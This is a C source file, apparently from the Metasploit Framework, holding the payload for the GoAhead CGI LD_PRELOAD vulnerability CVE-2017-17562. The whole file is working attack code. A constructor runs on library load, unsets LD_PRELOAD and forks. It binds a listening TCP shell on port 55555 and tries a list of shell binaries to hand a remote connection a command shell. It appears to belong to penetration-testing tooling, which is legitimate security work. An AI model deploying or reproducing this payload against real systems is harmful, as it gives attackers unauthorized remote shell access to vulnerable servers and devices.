metasploit-framework/data/exploits/CVE-2017-17562/goahead-cgi-bind.c

#include <arpa/inet.h>
#include <netdb.h>
#include <netinet/in.h>
#include <stdbool.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <sys/mman.h>
#include <sys/socket.h>
#include <sys/types.h>
#include <sys/wait.h>
#include <unistd.h>

#ifdef OLD_LIB_SET_1
__asm__(".symver system,system@GLIBC_2.0");
__asm__(".symver fork,fork@GLIBC_2.0");
#endif

#ifdef OLD_LIB_SET_2
__asm__(".symver system,system@GLIBC_2.2.5");
__asm__(".symver fork,fork@GLIBC_2.2.5");
#endif

static void _bind_tcp_shell(void) {

  int sfd, fd, i;
  struct sockaddr_in addr,saddr;
  unsigned int saddr_len = sizeof(struct sockaddr_in);

  char *lport = "55555";
  char *shells[] = {
    "/bin/bash",
    "/usr/bin/bash",
    "/bin/sh",
    "/usr/bin/sh",
    "/bin/ash",
    "/usr/bin/ash",
    "/bin/dash",
    "/usr/bin/dash",
    "/bin/csh",
    "/usr/bin/csh",
    "/bin/ksh",
    "/usr/bin/ksh",
    "/bin/busybox",
    "/usr/bin/busybox",
    NULL
  };

  sfd = socket(AF_INET, SOCK_STREAM, 0);
  setsockopt(sfd, SOL_SOCKET, SO_REUSEADDR, &(int){ 1 }, sizeof(int));

  saddr.sin_family = AF_INET;
  saddr.sin_port = htons(atoi(lport));
  saddr.sin_addr.s_addr = INADDR_ANY;
  bzero(&saddr.sin_zero, 8);

  if (bind(sfd, (struct sockaddr *) &saddr, saddr_len) == -1) {
    exit(1);
  }

  if (listen(sfd, 5) == -1) {
    close(sfd);
    exit(1);
  }

  fd = accept(sfd, (struct sockaddr *) &addr, &saddr_len);
  close(sfd);

  if (fd == -1) {
    exit(1);
  }

  for (i=0; i<3; i++) {
    dup2(fd, i);
  }

  /* Keep trying until execl() succeeds */
  for (i=0; ; i++) {
    if (shells[i] == NULL) break;
    execl(shells[i], "sh", NULL);
  }

  /* Close the connection if we failed to find a shell */
  close(fd);
}

static void _run_payload_(void) __attribute__((constructor));

static void _run_payload_(void)
{
    unsetenv("LD_PRELOAD");
    if (! fork())
      _bind_tcp_shell();

    exit(0);
}